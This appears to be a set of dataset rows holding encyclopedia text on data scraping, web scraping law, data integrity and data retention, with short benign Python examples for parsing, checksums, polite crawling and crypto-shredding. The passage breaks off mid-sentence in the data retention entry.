7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
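To make the report-mining idea concrete, here is a minimal sketch that assumes a hypothetical spooled text report with "name amount date" lines; a regular expression turns the human-readable lines into structured records while skipping headers, rules, and totals:

```python
import re
import pandas as pd

# Hypothetical spool-file content, as a printer-oriented report might look.
report_text = """\
DAILY SALES REPORT            PAGE 1
--------------------------------------
Acme Widgets        $1,250.00  2024-04-01
Globex Corp           $980.50  2024-04-02
--------------------------------------
TOTAL               $2,230.50
"""

# One capture group per column; lines without all three columns simply do not match.
line_pattern = re.compile(
    r"^(?P<name>[A-Za-z][A-Za-z ]+?)\s+\$(?P<amount>[\d,]+\.\d{2})\s+(?P<date>\d{4}-\d{2}-\d{2})\s*$",
    re.MULTILINE,
)

rows = [
    {"name": m["name"].strip(),
     "amount": float(m["amount"].replace(",", "")),
     "date": m["date"]}
    for m in line_pattern.finditer(report_text)
]
df = pd.DataFrame(rows)
print(df)
```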
615 | https://en.wikipedia.org/wiki/Data_scraping | https://fi.wikipedia.org/wiki/Tiedonharavointi | Tiedonharavointi 1 2 (also "web scraping" or "web page harvesting"; in English: scraping, web harvesting, web data extraction) means the automatic collection of information formatted for human reading from source material, especially from web pages. Pages can be mined for textual data, images, or videos. A web harvester may also be interested in, for example, product information such as prices on different websites, customer feedback, or social media posts. The information is collected, for example, for processing in a program, into a database, or into a spreadsheet. Data collection can be done by hand, but typically automated tools are used that isolate the desired information. The program can be given URLs from which the HTML file of a web page is downloaded. More advanced scrapers can download an entire web page, including its CSS style sheets and JavaScript. The harvester looks for all usable information on the page, or for some information the user has specified before the run, and converts it into a form useful to the user, for example a CSV or Excel file or even JSON, which can be processed further. Harvesting can be done by hand with copy and paste (or by saving files). A user can write their own script that finds information, for example with regular expressions, by parsing and walking the document's DOM model, by looking for metadata, or even with machine learning and computer vision. Ready-made, customizable programs and browser extensions also exist for this purpose. Parties whose data is being harvested can try to prevent it, for example through the website's terms of use. A website's code can also be obfuscated to make it unreadable. CAPTCHA challenges can effectively prevent automated data harvesting. The use of APIs can be considered the opposite of harvesting: many large websites such as Google, Facebook, or StackOverflow offer a ready-made interface through which the site's data can be used in structured form. |
616 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_integrity | Data integrity is the maintenance of, and the assurance of, data accuracy and consistency over its entire life-cycle. 1 It is a critical aspect to the design, implementation, and usage of any system that stores, processes, or retrieves data. The term is broad in scope and may have widely different meanings depending on the specific context even under the same general umbrella of computing. It is at times used as a proxy term for data quality, 2 while data validation is a prerequisite for data integrity. 3 Data integrity is the opposite of data corruption. 4 The overall intent of any data integrity technique is the same: ensure data is recorded exactly as intended (such as a database correctly rejecting mutually exclusive possibilities). Moreover, upon later retrieval, ensure the data is the same as when it was originally recorded. In short, data integrity aims to prevent unintentional changes to information. Data integrity is not to be confused with data security, the discipline of protecting data from unauthorized parties. Any unintended changes to data as the result of a storage, retrieval or processing operation, including malicious intent, unexpected hardware failure, and human error, is failure of data integrity. If the changes are the result of unauthorized access, it may also be a failure of data security. Depending on the data involved this could manifest itself as benign as a single pixel in an image appearing a different color than was originally recorded, to the loss of vacation pictures or a business-critical database, to even catastrophic loss of human life in a life-critical system. Physical integrity deals with challenges which are associated with correctly storing and fetching the data itself. Challenges with physical integrity may include electromechanical faults, design flaws, material fatigue, corrosion, power outages, natural disasters, and other special environmental hazards such as ionizing radiation, extreme temperatures, pressures and g-forces. Ensuring physical integrity includes methods such as redundant hardware, an uninterruptible power supply, certain types of RAID arrays, radiation hardened chips, error-correcting memory, use of a clustered file system, using file systems that employ block level checksums such as ZFS, storage arrays that compute parity calculations such as exclusive or or use a cryptographic hash function and even having a watchdog timer on critical subsystems. Physical integrity often makes extensive use of error detecting algorithms known as error-correcting codes. Human-induced data integrity errors are often detected through the use of simpler checks and algorithms, such as the Damm algorithm or Luhn algorithm. These are used to maintain data integrity after manual transcription from one computer system to another by a human intermediary (e.g. credit card or bank routing numbers). Computer-induced transcription errors can be detected through hash functions. In production systems, these techniques are used together to ensure various degrees of data integrity. For example, a computer file system may be configured on a fault-tolerant RAID array, but might not provide block-level checksums to detect and prevent silent data corruption. As another example, a database management system might be compliant with the ACID properties, but the RAID controller or hard disk drive's internal write cache might not be. 
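As a concrete illustration of the transcription checks mentioned above, here is a minimal sketch of the Luhn check-digit algorithm (the scheme used for credit card numbers); it catches all single-digit typos and most adjacent transpositions introduced by manual re-keying:

```python
def luhn_valid(number: str) -> bool:
    """Return True if the digit string passes the Luhn checksum."""
    digits = [int(c) for c in number if c.isdigit()]
    total = 0
    # Starting from the rightmost digit, double every second digit and
    # subtract 9 when the doubled value exceeds 9 (i.e. sum its digits).
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

# 79927398713 is the standard Luhn test number; altering one digit breaks it.
print(luhn_valid("79927398713"))   # True
print(luhn_valid("79927398710"))   # False
```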
This type of integrity is concerned with the correctness or rationality of a piece of data, given a particular context. This includes topics such as referential integrity and entity integrity in a relational database or correctly ignoring impossible sensor data in robotic systems. These concerns involve ensuring that the data "makes sense" given its environment. Challenges include software bugs, design flaws, and human errors. Common methods of ensuring logical integrity include things such as check constraints, foreign key constraints, program assertions, and other run-time sanity checks. Physical and logical integrity often share many challenges such as human errors and design flaws, and both must appropriately deal with concurrent requests to record and retrieve data, the latter of which is entirely a subject on its own. If a data sector only has a logical error, it can be reused by overwriting it with new data. In case of a physical error, the affected data sector is permanently unusable. Data integrity contains guidelines for data retention, specifying or guaranteeing the length of time data can be retained in a particular database (typically a relational database). To achieve data integrity, these rules are consistently and routinely applied to all data entering the system, and any relaxation of enforcement could cause errors in the data. Implementing checks on the data as close as possible to the source of input (such as human data entry), causes less erroneous data to enter the system. Strict enforcement of data integrity rules results in lower error rates, and time saved troubleshooting and tracing erroneous data and the errors it causes to algorithms. Data integrity also includes rules defining the relations a piece of data can have to other pieces of data, such as a Customer record being allowed to link to purchased Products, but not to unrelated data such as Corporate Assets. Data integrity often includes checks and correction for invalid data, based on a fixed schema or a predefined set of rules. An example being textual data entered where a date-time value is required. Rules for data derivation are also applicable, specifying how a data value is derived based on algorithm, contributors and conditions. It also specifies the conditions on how the data value could be re-derived. Data integrity is normally enforced in a database system by a series of integrity constraints or rules. Three types of integrity constraints are an inherent part of the relational data model: entity integrity, referential integrity and domain integrity. If a database supports these features, it is the responsibility of the database to ensure data integrity as well as the consistency model for the data storage and retrieval. If a database does not support these features, it is the responsibility of the applications to ensure data integrity while the database supports the consistency model for the data storage and retrieval. Having a single, well-controlled, and well-defined data-integrity system increases: Modern databases support these features (see Comparison of relational database management systems), and it has become the de facto responsibility of the database to ensure data integrity. Companies, and indeed many database systems, offer products and services to migrate legacy systems to modern databases. An example of a data-integrity mechanism is the parent-and-child relationship of related records. 
If a parent record owns one or more related child records all of the referential integrity processes are handled by the database itself, which automatically ensures the accuracy and integrity of the data so that no child record can exist without a parent (also called being orphaned) and that no parent loses their child records. It also ensures that no parent record can be deleted while the parent record owns any child records. All of this is handled at the database level and does not require coding integrity checks into each application. Various research results show that neither widespread filesystems (including UFS, Ext, XFS, JFS and NTFS) nor hardware RAID solutions provide sufficient protection against data integrity problems. 5 6 7 8 9 Some filesystems (including Btrfs and ZFS) provide internal data and metadata checksumming that is used for detecting silent data corruption and improving data integrity. If a corruption is detected that way and internal RAID mechanisms provided by those filesystems are also used, such filesystems can additionally reconstruct corrupted data in a transparent way. 10 This approach allows improved data integrity protection covering the entire data paths, which is usually known as end-to-end data protection. 11 |
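The block-level checksumming that filesystems such as ZFS and Btrfs perform can be approximated at the application level. A minimal sketch, assuming a hypothetical data file and sidecar naming scheme, that records a SHA-256 digest when the file is written and re-verifies it on read to detect silent corruption:

```python
import hashlib
from pathlib import Path

def write_with_checksum(path: Path, data: bytes) -> None:
    """Write data and store its SHA-256 digest in a sidecar file."""
    path.write_bytes(data)
    digest = hashlib.sha256(data).hexdigest()
    path.with_suffix(path.suffix + ".sha256").write_text(digest)

def verify(path: Path) -> bool:
    """Recompute the digest and compare it with the stored one."""
    stored = path.with_suffix(path.suffix + ".sha256").read_text().strip()
    actual = hashlib.sha256(path.read_bytes()).hexdigest()
    return stored == actual

f = Path("scraped_rows.csv")               # hypothetical data file
write_with_checksum(f, b"id,text\n1,hello\n")
print("intact:", verify(f))                # True unless the bytes changed on disk
```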
617 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-4 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
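The fetch-then-extract loop described above maps directly onto the libraries already imported in this notebook. A minimal sketch, assuming a hypothetical page URL, that fetches a page, extracts link text and targets, and loads the result into a spreadsheet-style table:

```python
import requests
import pandas as pd
from bs4 import BeautifulSoup
from urllib.parse import urljoin

url = "https://example.com"                      # hypothetical page to scrape
html = requests.get(url, timeout=10).text

soup = BeautifulSoup(html, "html5lib")
rows = [
    {"text": a.get_text(strip=True), "href": urljoin(url, a["href"])}
    for a in soup.find_all("a", href=True)
]

df = pd.DataFrame(rows)
df.to_csv("links.csv", index=False)              # "copied into a spreadsheet"
print(df.head())
```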
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
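The grep-style approach described at the start of the paragraph above needs little more than the standard re module. A minimal sketch, assuming a hypothetical page URL and deliberately simplified patterns, that pulls e-mail addresses and dollar amounts out of raw HTML with regular expressions and no DOM parsing at all:

```python
import re
import requests

url = "https://example.com/contact"              # hypothetical page
html = requests.get(url, timeout=10).text

# Deliberately simple patterns; real-world variants are messier.
email_pattern = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
price_pattern = re.compile(r"\$\d[\d,]*(?:\.\d{2})?")

emails = sorted(set(email_pattern.findall(html)))
prices = price_pattern.findall(html)

print("emails found:", emails)
print("prices found:", prices)
```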
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
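To give a feel for the framework-style tools listed above, here is a minimal Scrapy spider. Scrapy is assumed to be installed separately (pip install scrapy); the selectors follow Scrapy's own tutorial target, quotes.toscrape.com, a site built for scraping practice, and the spider can be run with: scrapy runspider quotes_spider.py -o quotes.json

import scrapy

class QuotesSpider(scrapy.Spider):
    name = "quotes"
    start_urls = ["https://quotes.toscrape.com/"]

    def parse(self, response):
        # Yield one item per quote block on the page.
        for quote in response.css("div.quote"):
            yield {
                "text": quote.css("span.text::text").get(),
                "author": quote.css("small.author::text").get(),
            }
        # Follow the pagination link, if any, and parse the next page the same way.
        next_page = response.css("li.next a::attr(href)").get()
        if next_page is not None:
            yield response.follow(next_page, callback=self.parse)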
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping would be a violation of contract law. It would also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
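Whatever blocking techniques a site deploys, the scraper-side counterpart is to fetch politely in the first place. The sketch below, with placeholder URLs and a hypothetical user-agent string, consults robots.txt before each request and throttles itself with a fixed delay.

import time
from urllib import robotparser
from urllib.parse import urljoin, urlparse

import requests

USER_AGENT = "ExampleResearchBot/0.1"   # hypothetical identifier
DELAY_SECONDS = 5                       # pause between requests

def allowed_by_robots(url):
    """Return True if the site's robots.txt permits USER_AGENT to fetch url."""
    root = "{0.scheme}://{0.netloc}".format(urlparse(url))
    parser = robotparser.RobotFileParser()
    parser.set_url(urljoin(root, "/robots.txt"))
    parser.read()
    return parser.can_fetch(USER_AGENT, url)

def polite_get(url):
    """Fetch url only if robots.txt allows it, then wait before returning."""
    if not allowed_by_robots(url):
        print(f"Skipping {url}: disallowed by robots.txt")
        return None
    response = requests.get(url, headers={"User-Agent": USER_AGENT}, timeout=10)
    time.sleep(DELAY_SECONDS)
    return response

if __name__ == "__main__":
    page = polite_get("https://example.com/listings")   # placeholder URL
    if page is not None:
        print(page.status_code)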
618 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_retention | Data retention defines the policies of persistent data and records management for meeting legal and business data archival requirements. Although sometimes interchangeable, it is not to be confused with the Data Protection Act 1998. The different data retention policies weigh legal and privacy concerns economics and need-to-know concerns to determine the retention time, archival rules, data formats, and the permissible means of storage, access, and encryption. 1 In the field of telecommunications, "data retention" generally refers to the storage of call detail records (CDRs) of telephony and internet traffic and transaction data (IPDRs) by governments and commercial organisations. 2 In the case of government data retention, the data that is stored is usually of telephone calls made and received, emails sent and received, and websites visited. Location data is also collected. The primary objective in government data retention is traffic analysis and mass surveillance. By analysing the retained data, governments can identify the locations of individuals, an individual's associates and the members of a group such as political opponents. These activities may or may not be lawful, depending on the constitutions and laws of each country. In many jurisdictions, access to these databases may be made by a government with little or no judicial oversight. citation needed 3 4 In the case of commercial data retention, the data retained will usually be on transactions and web sites visited. Data retention also covers data collected by other means (e.g., by Automatic number-plate recognition systems) and held by government and commercial organisations. A data retention policy is a recognized and proven protocol within an organization for retaining information for operational use while ensuring adherence to the laws and regulations concerning them. The objectives of a data retention policy are to keep important information for future use or reference, to organize information so it can be searched and accessed at a later date and to dispose of information that is no longer needed. 5 The data retention policies within an organization are a set of guidelines that describes which data will be archived, how long it will be kept, what happens to the data at the end of the retention period (archive or destroy) and other factors concerning the retention of the data. 6 A part of any effective data retention policy is the permanent deletion of the retained data; achieving secure deletion of data by encrypting the data when stored, and then deleting the encryption key after a specified retention period. Thus, effectively deleting the data object and its copies stored in online and offline locations. 7 In 2015, the Australian government introduced mandatory data retention laws that allows data to be retained up to two years. 8 The scheme is estimated to cost at least AU$400 million per year to implement, working out to at least $16 per user per year. 9 It requires telecommunication providers and ISPs to retain telephony, Internet and email metadata for two years, accessible without a warrant, and could possibly be used to target file sharing. 10 11 The Attorney-General has broad discretion on which agencies are allowed to access metadata, including private agencies. 
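The key-deletion approach to disposal described above, often called crypto-shredding, can be sketched with the cryptography package (assumed to be installed separately: pip install cryptography). Each record is stored only in encrypted form, so discarding the key makes every retained copy unreadable.

from cryptography.fernet import Fernet

class RetainedRecord:
    """Holds one record in encrypted form; discarding the key 'deletes' it."""

    def __init__(self, plaintext):
        self._key = Fernet.generate_key()
        self._ciphertext = Fernet(self._key).encrypt(plaintext)

    def read(self):
        if self._key is None:
            raise PermissionError("record has been crypto-shredded")
        return Fernet(self._key).decrypt(self._ciphertext)

    def shred(self):
        # Deleting the key renders the ciphertext, and all copies of it, useless.
        self._key = None

if __name__ == "__main__":
    record = RetainedRecord(b"call detail record: caller A -> caller B, 42 seconds")
    print(record.read())        # readable while the key is retained
    record.shred()
    try:
        record.read()
    except PermissionError as error:
        print("after shredding:", error)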
12 The Greens were strongly opposed to the introduction of these laws, citing privacy concerns and the increased prospect of 'speculative invoicing' over alleged copyright infringement cases. 13 14 The Labor Party initially opposed as well, but later agreed to passing the law after additional safeguards were put in place to afford journalists some protection. 15 16 On 15 March 2006, the European Union adopted the Data Retention Directive. 17 18 It required Member States to ensure that communications providers retain data as specified in the Directive for a period of between 6 months and 2 years in order to: The data was required to be available to "competent" national authorities "for the purpose of the investigation, detection and prosecution of serious crime, as defined by each Member State in its national law". The Directive covered fixed telephony, mobile telephony, Internet access, email, and VoIP. Member States were required to transpose it into national law within 18 months—no later than September 2007. However, they could if they wished postpone the application of the Directive to Internet access, email, and VoIP for a further 18 months after this date. A majority of Member States exercised this option. All 28 EU States at the time notified the European Commission about the transposition of the Directive into their national law. Of these, however, Germany and Belgium had only transposed the legislation partially. 19 A report evaluating the Directive was published by the European Commission in April 2011. 20 It concluded that data retention was a valuable tool for ensuring criminal justice and public protection, but that it had achieved only limited harmonisation. There were serious concerns from service providers about the compliance costs and from civil society organisations who claimed that mandatory data retention was an unacceptable infringement of the fundamental right to privacy and the protection of personal data according to EU law. In response to the report, on May 31, 2011, the European Data Protection Supervisor expressed some concerns on the European Data Retention Directive, underlining that the Directive "does not meet the requirements imposed by the fundamental rights to privacy and data protection". 21 In November 2012, answers to a parliamentary inquiry in the German Bundestag revealed plans of some EU countries including France to extend data retention to chats and social media. Furthermore, the German Federal Office for the Protection of the Constitution (Germany's domestic intelligence agency) has confirmed that it has been working with the ETSI LI Technical Committee since 2003. 22 23 24 25 26 Criticisms of the directive arose. The council's Legal Services was reported to have stated in closed session that paragraph 59 of the European Court of Justice's ruling "suggests that general and blanket data retention is no longer possible". 27 A legal opinion funded by the Greens EFA Group in the European Parliament finds that the blanket retention data of unsuspected persons generally violates the EU Charter of Fundamental Rights, both in regard to national telecommunications data retention laws and to similar EU data retention schemes (PNR, TFTP, TFTS, LEA access to EES, Eurodac, VIS). 28 Digital Rights Ireland brought the directive to the High Court of Ireland, which then brought it further to the European Court of Justice of the European Union. The case was also joined by the Constitutional Court of Austria. 
The Court on 8 April 2014 declared the Directive 2006 24 EC invalid for violating fundamental rights, stating that "the directive interferes in a particularly serious manner with the fundamental rights to respect for private life and to the protection of personal data". 29 30 This led further to that the member states in various degrees abolished or modified their implementations of the directive. Since the Swedish implementation of the directive was kept in a similar manner, the Swedish implementation was brought to the European Court by the telecom provider Tele2, and the case was merged with a similar case from the United Kingdom, initiated by three persons with intervention by Open Rights Group, Privacy International and The Law Society of England and Wales. Since the original directive no longer existed, the basis for the judgment was an exception to the Directive on privacy and electronic communications 31 in its Article 15(1), referring to the possibility to exceptionally apply data retention for fighting serious crime. On the 21 of December 2016 the Court ruled that "the protection of privacy in the electronic communications sector must be interpreted as precluding national legislation which, for the purpose of fighting crime, provides for general and indiscriminate retention of all traffic and location data of all subscribers and registered users relating to all means of electronic communication. 32 Blanket data retention was ruled out another time, but the actual consequences all over the EU are varied and under discussion since then. Implementation of the directive was part of Act. No. 259 2010 Coll. on electronic communications as later amended. Under Art. 97 (3), telecommunication data are to be stored between 6 and 12 months. The Czech Constitutional Court has deemed the law unconstitutional and found it to be infringing on the peoples right to privacy. 33 As of July 2012, new legislation was on its way. 34 Denmark has implemented the EU data retention directive and much more, by logging all internet flow or sessions between operators and operators and consumers. 35 The German Bundestag had implemented the directive in "Gesetz zur Neuregelung der Telekommunikations berwachung und anderer verdeckter Ermittlungsma nahmen sowie zur Umsetzung der Richtlinie 2006 24 EG". 36 The law became valid on 1 January 2008. Any communications data had to be retained for six months. On 2 March 2010, the Federal 